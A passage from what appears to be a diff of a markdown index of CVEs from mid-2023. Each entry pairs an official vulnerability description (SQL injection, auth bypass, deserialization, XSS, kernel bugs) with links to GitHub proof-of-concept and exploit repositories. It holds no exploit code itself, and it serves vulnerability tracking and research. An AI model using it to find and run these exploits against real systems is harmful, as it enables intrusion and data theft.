[syedhafiz1234/CVE-2023-34039](https://github.com/syedhafiz1234/CVE-2023-34039) +- [adminxb/CVE-2023-34039](https://github.com/adminxb/CVE-2023-34039) + +### CVE-2023-34040 (2023-08-24) + +In Spring for Apache Kafka 3.0.9 and earlier and versions 2.9.10 and earlier, a possible deserialization attack vector existed, but only if unusual configuration was applied. An attacker would have to construct a malicious serialized object in one of the deserialization exception record headers.\n\nSpecifically, an application is vulnerable when all of the following are true:\n\n * The user does not configure an ErrorHandlingDeserializer for the key and/or value of the record\n * The user explicitly sets container properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull container properties to true.\n * The user allows untrusted sources to publish to a Kafka topic\n\n\nBy default, these properties are false, and the container only attempts to deserialize the headers if an ErrorHandlingDeserializer is configured. The ErrorHandlingDeserializer prevents the vulnerability by removing any such malicious headers before processing the record.\n\n\n + + +- [Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040](https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040) +- [pyn3rd/CVE-2023-34040](https://github.com/pyn3rd/CVE-2023-34040) +- [buiduchoang24/CVE-2023-34040](https://github.com/buiduchoang24/CVE-2023-34040) +- [huyennhat-dev/cve-2023-34040](https://github.com/huyennhat-dev/cve-2023-34040) + +### CVE-2023-34050 (2023-10-19) + +\n\n\n\n\n\n\n\n\n\nIn spring AMQP versions 1.0.0 to\n2.4.16 and 3.0.0 to 3.0.9 , allowed list patterns for deserializable class\nnames were added to Spring AMQP, allowing users to lock down deserialization of\ndata in messages from untrusted sources; however by default, when no allowed\nlist was provided, all classes could be deserialized.\n\n\n\nSpecifically, an application is\nvulnerable if\n\n\n\n\n * the\n SimpleMessageConverter or SerializerMessageConverter is used\n\n * the user\n does not configure allowed list patterns\n\n * untrusted\n message originators gain permissions to write messages to the RabbitMQ\n broker to send malicious content\n\n\n\n\n\n\n\n\n\n + + +- [X1r0z/spring-amqp-deserialization](https://github.com/X1r0z/spring-amqp-deserialization) + +### CVE-2023-34051 (2023-10-20) + +VMware Aria Operations for Logs contains an authentication bypass vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.\n + + +- [horizon3ai/CVE-2023-34051](https://github.com/horizon3ai/CVE-2023-34051) + +### CVE-2023-34092 (2023-06-01) + +Vite provides frontend tooling. Prior to versions 2.9.16, 3.2.7, 4.0.5, 4.1.5, 4.2.3, and 4.3.9, Vite Server Options (`server.fs.deny`) can be bypassed using double forward-slash (//) allows any unauthenticated user to read file from the Vite root-path of the application including the default `fs.deny` settings (`['.env', '.env.*', '*.{crt,pem}']`). Only users explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected, and only files in the immediate Vite project root folder could be exposed. This issue is fixed in vite@4.3.9, vite@4.2.3, vite@4.1.5, vite@4.0.5, vite@3.2.7, and vite@2.9.16. + + +- [FlapyPan/test-cve-2023-34092](https://github.com/FlapyPan/test-cve-2023-34092) + +### CVE-2023-34096 (2023-06-08) + +Thruk is a multibackend monitoring webinterface which currently supports Naemon, Icinga, Shinken and Nagios as backends. In versions 3.06 and prior, the file `panorama.pm` is vulnerable to a Path Traversal vulnerability which allows an attacker to upload a file to any folder which has write permissions on the affected system. The parameter location is not filtered, validated or sanitized and it accepts any kind of characters. For a path traversal attack, the only characters required were the dot (`.`) and the slash (`/`). A fix is available in version 3.06.2. + + +- [galoget/Thruk-CVE-2023-34096](https://github.com/galoget/Thruk-CVE-2023-34096) + +### CVE-2023-34152 (2023-05-30) + +A vulnerability was found in ImageMagick. This security flaw cause a remote code execution vulnerability in OpenBlob with --enable-pipes configured. + + +- [overgrowncarrot1/ImageTragick_CVE-2023-34152](https://github.com/overgrowncarrot1/ImageTragick_CVE-2023-34152) +- [SudoIndividual/CVE-2023-34152](https://github.com/SudoIndividual/CVE-2023-34152) + +### CVE-2023-34212 (2023-06-12) + +The JndiJmsConnectionFactoryProvider Controller Service, along with the ConsumeJMS and PublishJMS Processors, in Apache NiFi 1.8.0 through 1.21.0 allow an authenticated and authorized user to configure URL and library properties that enable deserialization of untrusted data from a remote location.\n\nThe resolution validates the JNDI URL and restricts locations to a set of allowed schemes.\n\nYou are recommended to upgrade to version 1.22.0 or later which fixes this issue.\n\n\n + + +- [mbadanoiu/CVE-2023-34212](https://github.com/mbadanoiu/CVE-2023-34212) + +### CVE-2023-34312 (2023-06-01) + +In Tencent QQ through 9.7.8.29039 and TIM through 3.4.7.22084, QQProtect.exe and QQProtectEngine.dll do not validate pointers from inter-process communication, which leads to a write-what-where condition. + + +- [vi3t1/qq-tim-elevation](https://github.com/vi3t1/qq-tim-elevation) +- [lan1oc/CVE-2023-34312-exp](https://github.com/lan1oc/CVE-2023-34312-exp) + +### CVE-2023-34362 (2023-06-02) + +In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions. + + +- [deepinstinct/MOVEit_CVE-2023-34362_IOCs](https://github.com/deepinstinct/MOVEit_CVE-2023-34362_IOCs) +- [horizon3ai/CVE-2023-34362](https://github.com/horizon3ai/CVE-2023-34362) +- [sfewer-r7/CVE-2023-34362](https://github.com/sfewer-r7/CVE-2023-34362) +- [kenbuckler/MOVEit-CVE-2023-34362](https://github.com/kenbuckler/MOVEit-CVE-2023-34362) +- [Malwareman007/CVE-2023-34362](https://github.com/Malwareman007/CVE-2023-34362) +- [toorandom/moveit-payload-decrypt-CVE-2023-34362](https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362) +- [errorfiathck/MOVEit-Exploit](https://github.com/errorfiathck/MOVEit-Exploit) +- [Chinyemba-ck/MOVEit-CVE-2023-34362](https://github.com/Chinyemba-ck/MOVEit-CVE-2023-34362) +- [glen-pearson/MoveIT-CVE-2023-34362-RCE](https://github.com/glen-pearson/MoveIT-CVE-2023-34362-RCE) +- [aditibv/MOVEit-CVE-2023-34362](https://github.com/aditibv/MOVEit-CVE-2023-34362) + +### CVE-2023-34458 (2023-07-13) + +mx-chain-go is the official implementation of the MultiversX blockchain protocol, written in golang. When executing a relayed transaction, if the inner transaction failed, it would have increased the inner transaction's sender account nonce. This could have contributed to a limited DoS attack on a targeted account. The fix is a breaking change so a new flag `RelayedNonceFixEnableEpoch` was needed. This was a strict processing issue while validating blocks on a chain. This vulnerability has been patched in version 1.4.17. + + +- [miguelc49/CVE-2023-34458-2](https://github.com/miguelc49/CVE-2023-34458-2) +- [miguelc49/CVE-2023-34458-1](https://github.com/miguelc49/CVE-2023-34458-1) +- [miguelc49/CVE-2023-34458-3](https://github.com/miguelc49/CVE-2023-34458-3) + +### CVE-2023-34468 (2023-06-12) + +The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution.\n\nThe resolution validates the Database URL and rejects H2 JDBC locations.\n\nYou are recommended to upgrade to version 1.22.0 or later which fixes this issue.\n\n\n + + +- [mbadanoiu/CVE-2023-34468](https://github.com/mbadanoiu/CVE-2023-34468) + +### CVE-2023-34537 (2023-06-13) + +A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data. + + +- [leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5](https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5) + +### CVE-2023-34584 +- [fu2x2000/-CVE-2023-34584](https://github.com/fu2x2000/-CVE-2023-34584) + +### CVE-2023-34598 (2023-06-29) + +Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) where it's possible to include the content of several files present in the installation folder in the server's response. + + +- [maddsec/CVE-2023-34598](https://github.com/maddsec/CVE-2023-34598) +- [Lserein/CVE-2023-34598](https://github.com/Lserein/CVE-2023-34598) + +### CVE-2023-34599 (2023-06-29) + +Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code. + + +- [maddsec/CVE-2023-34599](https://github.com/maddsec/CVE-2023-34599) + +### CVE-2023-34600 (2023-06-20) + +Adiscon LogAnalyzer v4.1.13 and before is vulnerable to SQL Injection. + + +- [costacoco/Adiscon](https://github.com/costacoco/Adiscon) + +### CVE-2023-34634 (2023-08-01) + +Greenshot 1.2.10 and below allows arbitrary code execution because .NET content is insecurely deserialized when a .greenshot file is opened. + + +- [radman404/CVE-2023-34634](https://github.com/radman404/CVE-2023-34634) + +### CVE-2023-34830 (2023-06-27) + +i-doit Open v24 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the timeout parameter on the login page. + + +- [leekenghwa/CVE-2023-34830---Reflected-XSS-found-in-I-doit-Open-v24-and-below](https://github.com/leekenghwa/CVE-2023-34830---Reflected-XSS-found-in-I-doit-Open-v24-and-below) + +### CVE-2023-34835 (2023-06-27) + +A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary JavaScript code via a vulnerable delete_file parameter. + + +- [sahiloj/CVE-2023-34835](https://github.com/sahiloj/CVE-2023-34835) + +### CVE-2023-34836 (2023-06-27) + +A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Dtltyp and ListName parameters. + + +- [sahiloj/CVE-2023-34836](https://github.com/sahiloj/CVE-2023-34836) + +### CVE-2023-34837 (2023-06-27) + +A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a vulnerable parameter GrpPath. + + +- [sahiloj/CVE-2023-34837](https://github.com/sahiloj/CVE-2023-34837) + +### CVE-2023-34838 (2023-06-27) + +A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Description parameter. + + +- [sahiloj/CVE-2023-34838](https://github.com/sahiloj/CVE-2023-34838) + +### CVE-2023-34839 (2023-06-27) + +A Cross Site Request Forgery (CSRF) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows a remote attacker to gain privileges via a Custom CSRF exploit to create new user function in the application. + + +- [sahiloj/CVE-2023-34839](https://github.com/sahiloj/CVE-2023-34839) + +### CVE-2023-34840 (2023-06-30) + +angular-ui-notification v0.1.0, v0.2.0, and v0.3.6 was discovered to contain a cross-site scripting (XSS) vulnerability. + + +- [Xh4H/CVE-2023-34840](https://github.com/Xh4H/CVE-2023-34840) + +### CVE-2023-34843 (2023-06-28) + +Traggo Server 0.3.0 is vulnerable to directory traversal via a crafted GET request. + + +- [rootd4ddy/CVE-2023-34843](https://github.com/rootd4ddy/CVE-2023-34843) + +### CVE-2023-34845 (2023-06-16) + +Bludit v3.14.1 was discovered to contain an arbitrary file upload vulnerability in the component /admin/new-content. This vulnerability allows attackers to execute arbitrary web scripts or HTML via uploading a crafted SVG file. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration). + + +- [r4vanan/CVE-2023-34845](https://github.com/r4vanan/CVE-2023-34845) + +### CVE-2023-34852 (2023-06-15) + +PublicCMS <=V4.0.202302 is vulnerable to Insecure Permissions. + + +- [funny-kill/CVE-2023-34852](https://github.com/funny-kill/CVE-2023-34852) + +### CVE-2023-34853 (2023-08-22) + +Buffer Overflow vulnerability in Supermicro motherboard X12DPG-QR 1.4b allows local attackers to hijack control flow via manipulation of SmcSecurityEraseSetupVar variable. + + +- [risuxx/CVE-2023-34853](https://github.com/risuxx/CVE-2023-34853) + +### CVE-2023-34924 (2023-06-26) + +H3C Magic B1STW B1STV100R012 was discovered to contain a stack overflow via the function SetAPInfoById. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. + + +- [ChrisL0tus/CVE-2023-34924](https://github.com/ChrisL0tus/CVE-2023-34924) + +### CVE-2023-34960 (2023-08-01) + +A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. + + +- [Aituglo/CVE-2023-34960](https://github.com/Aituglo/CVE-2023-34960) +- [Jenderal92/CHAMILO-CVE-2023-34960](https://github.com/Jenderal92/CHAMILO-CVE-2023-34960) +- [YongYe-Security/CVE-2023-34960](https://github.com/YongYe-Security/CVE-2023-34960) +- [ThatNotEasy/CVE-2023-34960](https://github.com/ThatNotEasy/CVE-2023-34960) +- [Mantodkaz/CVE-2023-34960](https://github.com/Mantodkaz/CVE-2023-34960) +- [tucommenceapousser/CVE-2023-34960-ex](https://github.com/tucommenceapousser/CVE-2023-34960-ex) +- [dvtarsoul/ChExp](https://github.com/dvtarsoul/ChExp) + +### CVE-2023-34965 (2023-06-13) + +SSPanel-Uim 2023.3 does not restrict access to the /link/ interface which can lead to a leak of user information. + + +- [AgentY0/CVE-2023-34965](https://github.com/AgentY0/CVE-2023-34965) + +### CVE-2023-34992 (2023-10-10) + +A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.0.0 and 6.7.0 through 6.7.5 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.1 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via crafted API requests. + + +- [horizon3ai/CVE-2023-34992](https://github.com/horizon3ai/CVE-2023-34992) +- [d0rb/CVE-2023-34992-Checker](https://github.com/d0rb/CVE-2023-34992-Checker) + +### CVE-2023-35001 (2023-07-05) + +Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace + + +- [synacktiv/CVE-2023-35001](https://github.com/synacktiv/CVE-2023-35001) +- [syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-](https://github.com/syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-) +- [mrbrelax/Exploit_CVE-2023-35001](https://github.com/mrbrelax/Exploit_CVE-2023-35001) + +### CVE-2023-35078 (2023-07-25) + +An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication. + + +- [vchan-in/CVE-2023-35078-Exploit-POC](https://github.com/vchan-in/CVE-2023-35078-Exploit-POC) +- [lager1/CVE-2023-35078](https://github.com/lager1/CVE-2023-35078) +- [raytheon0x21/CVE-2023-35078](https://github.com/raytheon0x21/CVE-2023-35078) +- [synfinner/CVE-2023-35078](https://github.com/synfinner/CVE-2023-35078) +- [emanueldosreis/nmap-CVE-2023-35078-Exploit](https://github.com/emanueldosreis/nmap-CVE-2023-35078-Exploit) +- [Blue-number/CVE-2023-35078](https://github.com/Blue-number/CVE-2023-35078) +- [0nsec/CVE-2023-35078](https://github.com/0nsec/CVE-2023-35078) + +### CVE-2023-35080 (2023-11-14) + +A vulnerability has been identified in the Ivanti Secure Access Windows client, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to various security risks, including the escalation of privileges, denial of service, or information disclosure. + + +- [HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation](https://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation) + +### CVE-2023-35082 (2023-08-15) + +An authentication bypass vulnerability in Ivanti EPMM 11.10 and older, allows unauthorized users to access restricted functionality or resources of the application without proper authentication. This vulnerability is unique to CVE-2023-35078 announced earlier. + + +- [Chocapikk/CVE-2023-35082](https://github.com/Chocapikk/CVE-2023-35082) + +### CVE-2023-35086 (2023-07-21) + +\nIt is identified a format string vulnerability in ASUS RT-AX56U V2 & RT-AC86U. This vulnerability is caused by directly using input as a format string when calling syslog in logmessage_normal function, in the do_detwan_cgi module of httpd. A remote attacker with administrator privilege can exploit this vulnerability to perform remote arbitrary code execution, arbitrary system operation or disrupt service.\n\nThis issue affects RT-AX56U V2: 3.0.0.4.386_50460; RT-AC86U: 3.0.0.4_386_51529.\n\n + + +- [tin-z/CVE-2023-35086-POC](https://github.com/tin-z/CVE-2023-35086-POC) + +### CVE-2023-35636 (2023-12-12) + +Microsoft Outlook Information Disclosure Vulnerability + + +- [duy-31/CVE-2023-35636](https://github.com/duy-31/CVE-2023-35636) + +### CVE-2023-35671 (2023-09-11) + +In onHostEmulationData of HostEmulationManager.java, there is a possible way for a general purpose NFC reader to read the full card number and expiry details when the device is in locked screen mode due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [MrTiz/CVE-2023-35671](https://github.com/MrTiz/CVE-2023-35671) + +### CVE-2023-35674 (2023-09-11) + +In onCreate of WindowState.java, there is a possible way to launch a background activity due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [Thampakon/CVE-2023-35674](https://github.com/Thampakon/CVE-2023-35674) +- [SpiralBL0CK/Guide-and-theoretical-code-for-CVE-2023-35674](https://github.com/SpiralBL0CK/Guide-and-theoretical-code-for-CVE-2023-35674) + +### CVE-2023-35687 (2023-09-11) + +In MtpPropertyValue of MtpProperty.h, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679](https://github.com/pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679) + +### CVE-2023-35744 (2024-05-03) + +D-Link DAP-2622 DDP Configuration Restore Server IPv6 Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root.\n. Was ZDI-CAN-20071. + + +- [ADSSA-IT/CVE-2023-35744](https://github.com/ADSSA-IT/CVE-2023-35744) + +### CVE-2023-35793 (2023-09-26) + +An issue was discovered in Cassia Access Controller 2.1.1.2303271039. Establishing a web SSH session to gateways is vulnerable to Cross Site Request Forgery (CSRF) attacks. + + +- [Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH](https://github.com/Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH) + +### CVE-2023-35794 (2023-10-27) + +An issue was discovered in Cassia Access Controller 2.1.1.2303271039. The Web SSH terminal endpoint (spawned console) can be accessed without authentication. Specifically, there is no session cookie validation on the Access Controller; instead, there is only Basic Authentication to the SSH console. + + +- [Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking](https://github.com/Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking) + +### CVE-2023-35801 (2023-06-23) + +A directory traversal vulnerability in Safe Software FME Server before 2022.2.5 allows an attacker to bypass validation when editing a network-based resource connection, resulting in the unauthorized reading and writing of arbitrary files. Successful exploitation requires an attacker to have access to a user account with write privileges. FME Flow 2023.0 is also a fixed version. + + +- [trustcves/CVE-2023-35801](https://github.com/trustcves/CVE-2023-35801) + +### CVE-2023-35803 (2023-10-04) + +IQ Engine before 10.6r2 on Extreme Network AP devices has a Buffer Overflow. + + +- [lachlan2k/CVE-2023-35803](https://github.com/lachlan2k/CVE-2023-35803) + +### CVE-2023-35813 (2023-06-17) + +Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3. + + +- [aalexpereira/CVE-2023-35813](https://github.com/aalexpereira/CVE-2023-35813) +- [BagheeraAltered/CVE-2023-35813-PoC](https://github.com/BagheeraAltered/CVE-2023-35813-PoC) + +### CVE-2023-35828 (2023-06-18) + +An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in renesas_usb3_remove in drivers/usb/gadget/udc/renesas_usb3.c. + + +- [Trinadh465/linux-4.19.72_CVE-2023-35828](https://github.com/Trinadh465/linux-4.19.72_CVE-2023-35828) + +### CVE-2023-35840 (2023-06-19) + +_joinPath in elFinderVolumeLocalFileSystem.class.php in elFinder before 2.1.62 allows path traversal in the PHP LocalVolumeDriver connector. + + +- [afine-com/CVE-2023-35840](https://github.com/afine-com/CVE-2023-35840) + +### CVE-2023-35843 (2023-06-19) + +NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information. + + +- [Lserein/CVE-2023-35843](https://github.com/Lserein/CVE-2023-35843) +- [b3nguang/CVE-2023-35843](https://github.com/b3nguang/CVE-2023-35843) + +### CVE-2023-35844 (2023-06-19) + +packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used. + + +- [Lserein/CVE-2023-35844](https://github.com/Lserein/CVE-2023-35844) + +### CVE-2023-35854 (2023-06-20) + +Zoho ManageEngine ADSelfService Plus through 6113 has an authentication bypass that can be exploited to steal the domain controller session token for identity spoofing, thereby achieving the privileges of the domain controller administrator. NOTE: the vendor's perspective is that they have "found no evidence or detail of a security vulnerability." + + +- [bluestarry33/exp](https://github.com/bluestarry33/exp) + +### CVE-2023-35885 (2023-06-20) + +CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication. + + +- [datackmy/FallingSkies-CVE-2023-35885](https://github.com/datackmy/FallingSkies-CVE-2023-35885) +- [Chocapikk/CVE-2023-35885](https://github.com/Chocapikk/CVE-2023-35885) + +### CVE-2023-35985 (2023-11-27) + +An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to a failure to properly validate a dangerous extension. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted malicious site if the browser plugin extension is enabled. + + +- [SpiralBL0CK/-CVE-2023-35985](https://github.com/SpiralBL0CK/-CVE-2023-35985) +- [N00BIER/CVE-2023-35985](https://github.com/N00BIER/CVE-2023-35985) + +### CVE-2023-36003 (2023-12-12) + +XAML Diagnostics Elevation of Privilege Vulnerability + + +- [m417z/CVE-2023-36003-POC](https://github.com/m417z/CVE-2023-36003-POC) +- [baph0m3th/CVE-2023-36003](https://github.com/baph0m3th/CVE-2023-36003) + +### CVE-2023-36025 (2023-11-14) + +Windows SmartScreen Security Feature Bypass Vulnerability + + +- [ka7ana/CVE-2023-36025](https://github.com/ka7ana/CVE-2023-36025) +- [J466Y/test_CVE-2023-36025](https://github.com/J466Y/test_CVE-2023-36025) +- [coolman6942o/-EXPLOIT-CVE-2023-36025](https://github.com/coolman6942o/-EXPLOIT-CVE-2023-36025) + +### CVE-2023-36076 (2023-09-01) + +SQL Injection vulnerability in smanga version 3.1.9 and earlier, allows remote attackers to execute arbitrary code and gain sensitive information via mediaId, mangaId, and userId parameters in php/history/add.php. + + +- [deIndra/CVE-2023-36076](https://github.com/deIndra/CVE-2023-36076) + +### CVE-2023-36085 (2023-10-24) + +The sisqualWFM 7.1.319.103 thru 7.1.319.111 for Android, has a host header injection vulnerability in its "/sisqualIdentityServer/core/" endpoint. By modifying the HTTP Host header, an attacker can change webpage links and even redirect users to arbitrary or malicious locations. This can lead to phishing attacks, malware distribution, and unauthorized access to sensitive resources. + + +- [omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection](https://github.com/omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection) + +### CVE-2023-36109 (2023-09-20) + +Buffer Overflow vulnerability in JerryScript version 3.0, allows remote attackers to execute arbitrary code via ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c. + + +- [Limesss/CVE-2023-36109](https://github.com/Limesss/CVE-2023-36109) + +### CVE-2023-36123 (2023-10-06) + +Directory Traversal vulnerability in Hex-Dragon Plain Craft Launcher 2 version Alpha 1.3.9, allows local attackers to execute arbitrary code and gain sensitive information. + + +- [9Bakabaka/CVE-2023-36123](https://github.com/9Bakabaka/CVE-2023-36123) + +### CVE-2023-36143 (2023-06-30) + +Maxprint Maxlink 1200G v3.4.11E has an OS command injection vulnerability in the "Diagnostic tool" functionality of the device. + + +- [leonardobg/CVE-2023-36143](https://github.com/leonardobg/CVE-2023-36143) +- [RobinTrigon/CVE-2023-36143](https://github.com/RobinTrigon/CVE-2023-36143) + +### CVE-2023-36144 (2023-06-30) + +An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration. + + +- [leonardobg/CVE-2023-36144](https://github.com/leonardobg/CVE-2023-36144) + +### CVE-2023-36146 (2023-06-30) + +A Stored Cross-Site Scripting (XSS) vulnerability was found in Multilaser RE 170 using firmware 2.2.6733. + + +- [leonardobg/CVE-2023-36146](https://github.com/leonardobg/CVE-2023-36146) + +### CVE-2023-36158 (2023-08-03) + +Cross Site Scripting (XSS) vulnerability in sourcecodester Toll Tax Management System 1.0 allows remote attackers to run arbitrary code via the First Name and Last Name fields on the My Account page. + + +- [unknown00759/CVE-2023-36158](https://github.com/unknown00759/CVE-2023-36158) + +### CVE-2023-36159 (2023-08-03) + +Cross Site Scripting (XSS) vulnerability in sourcecodester Lost and Found Information System 1.0 allows remote attackers to run arbitrary code via the First Name, Middle Name and Last Name fields on the Create User page. + + +- [unknown00759/CVE-2023-36159](https://github.com/unknown00759/CVE-2023-36159) + +### CVE-2023-36163 (2023-07-11) + +Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL. + + +- [TraiLeR2/CVE-2023-36163](https://github.com/TraiLeR2/CVE-2023-36163) + +### CVE-2023-36164 +- [TraiLeR2/CVE-2023-36164](https://github.com/TraiLeR2/CVE-2023-36164) + +### CVE-2023-36165 +- [TraiLeR2/CVE-2023-36165](https://github.com/TraiLeR2/CVE-2023-36165) + +### CVE-2023-36168 +- [TraiLeR2/CVE-2023-36168](https://github.com/TraiLeR2/CVE-2023-36168) + +### CVE-2023-36169 +- [TraiLeR2/CVE-2023-36169](https://github.com/TraiLeR2/CVE-2023-36169) + +### CVE-2023-36250 (2023-09-14) + +CSV Injection vulnerability in GNOME time tracker version 3.0.2, allows local attackers to execute arbitrary code via crafted .tsv file when creating a new record. + + +- [BrunoTeixeira1996/CVE-2023-36250](https://github.com/BrunoTeixeira1996/CVE-2023-36250) + +### CVE-2023-36281 (2023-08-22) + +An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via a JSON file to load_prompt. This is related to __subclasses__ or a template. + + +- [tagomaru/CVE-2023-36281](https://github.com/tagomaru/CVE-2023-36281) +- [miguelc49/CVE-2023-36281-2](https://github.com/miguelc49/CVE-2023-36281-2) +- [miguelc49/CVE-2023-36281-1](https://github.com/miguelc49/CVE-2023-36281-1) + +### CVE-2023-36319 (2023-09-19) + +File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file. + + +- [Lowalu/CVE-2023-36319](https://github.com/Lowalu/CVE-2023-36319) + +### CVE-2023-36407 (2023-11-14) + +Windows Hyper-V Elevation of Privilege Vulnerability + + +- [zha0/CVE-2023-36407](https://github.com/zha0/CVE-2023-36407) +- [pwndorei/CVE-2023-36407](https://github.com/pwndorei/CVE-2023-36407) + +### CVE-2023-36424 (2023-11-14) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [zerozenxlabs/CVE-2023-36424](https://github.com/zerozenxlabs/CVE-2023-36424) + +### CVE-2023-36427 (2023-11-14) + +Windows Hyper-V Elevation of Privilege Vulnerability + + +- [tandasat/CVE-2023-36427](https://github.com/tandasat/CVE-2023-36427) + +### CVE-2023-36531 +- [RandomRobbieBF/CVE-2023-36531](https://github.com/RandomRobbieBF/CVE-2023-36531) + +### CVE-2023-36643 (2024-04-04) + +Incorrect Access Control in ITB-GmbH TradePro v9.5, allows remote attackers to receive all orders from the online shop via oordershow component in customer function. + + +- [caffeinated-labs/CVE-2023-36643](https://github.com/caffeinated-labs/CVE-2023-36643) + +### CVE-2023-36644 (2024-04-04) + +Incorrect Access Control in ITB-GmbH TradePro v9.5, allows remote attackers to receive all order confirmations from the online shop via the printmail plugin. + + +- [caffeinated-labs/CVE-2023-36644](https://github.com/caffeinated-labs/CVE-2023-36644) + +### CVE-2023-36645 (2024-04-04) + +SQL injection vulnerability in ITB-GmbH TradePro v9.5, allows remote attackers to run SQL queries via oordershow component in customer function. + + +- [caffeinated-labs/CVE-2023-36645](https://github.com/caffeinated-labs/CVE-2023-36645) + +### CVE-2023-36664 (2023-06-25) + +Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix). + + +- [jakabakos/CVE-2023-36664-Ghostscript-command-injection](https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection) +- [winkler-winsen/Scan_GhostScript](https://github.com/winkler-winsen/Scan_GhostScript) +- [jeanchpt/CVE-2023-36664](https://github.com/jeanchpt/CVE-2023-36664) +- 